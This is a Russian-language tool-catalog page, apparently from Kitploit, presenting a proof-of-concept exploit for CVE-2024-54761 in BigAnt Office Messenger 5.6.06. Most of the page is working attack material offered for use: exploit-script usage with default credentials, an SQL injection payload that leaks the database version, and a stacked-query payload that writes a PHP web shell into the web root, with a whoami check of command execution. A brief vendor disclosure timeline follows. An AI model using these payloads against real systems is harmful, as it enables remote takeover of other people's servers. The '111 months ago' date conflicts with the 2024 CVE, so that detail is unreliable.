Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2024-54761 — CVE-2024-54761 PoC | Kitploit
Инструменты/GitHubGitHub/nscan9/cve-2024-54761
Payload GenerationVulnerability AnalysisExploitationWeb Application ExploitationPenetration Testing
GitHubnscan9/cve-2024-54761

CVE-2024-54761

CVE-2024-54761 PoC

Репозиторий
111 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

BigAnt Office Messenger 5.6.06 RCE через SQL-инъекцию

Уязвимость SQL-инъекции в BigAnt Messenger приводит к уязвимости RCE. Следуйте шагам для эксплуатации.

Usage:

root@kitploit:~
CVE-2024-54761.py [-h] -r RHOST [-p RPORT] [-u USERNAME] [-P PASSWORD]
options:
  -h, --help            показать это справочное сообщение и выйти
  -r, --rhost RHOST     IP-адрес цели
  -p, --rport RPORT     Порт цели (по умолчанию 8000)
  -u, --username USERNAME
                        Имя пользователя для входа (по умолчанию admin)
  -P, --password PASSWORD
                        Пароль для входа (по умолчанию 123456)

Запустите эксплойт с учётными данными по умолчанию.

root@kitploit:~
python CVE-2024-54761.py -r 127.0.0.1
Эксплойт

Ручная эксплуатация

Извлеките версию базы данных с помощью параметра dev_code, подверженного SQLi.

root@kitploit:~
# Payload
?dev_code=AND EXTARCTVALUE(rand(),concat(CHAR(126),version(),CHAR(126)))--

Версия SQLI Загрузите PHP-веб-шелл на цель с помощью стековых запросов SQL.

root@kitploit:~
# Payload
?dev_code=;SELECT "<?php system($_GET['cmd']); ?>" INTO OUTFILE 'C:/Program Files (x86)/BigAntSoft/IM Console/im_webserver/htdocs/shell.php'-- -

создание веб-шелла 1 Подтверждение выполнения команды:

root@kitploit:~
/shell.php?cmd=whoami

whoami команда dir

Хронология

31-10-2024: Отправлены уязвимости вендору по электронной почте

31-10-2024: Направлено письмо вендору, ответа не получено

15-11-2024: Направлено письмо вендору, ответа не получено

15-11-2024: Запрошены CVE

Ссылки

https://gist.github.com/nscan9/a31982c90ab40a8e00373bf15efbf52a
https://www.bigantsoft.com

Скачать инструмент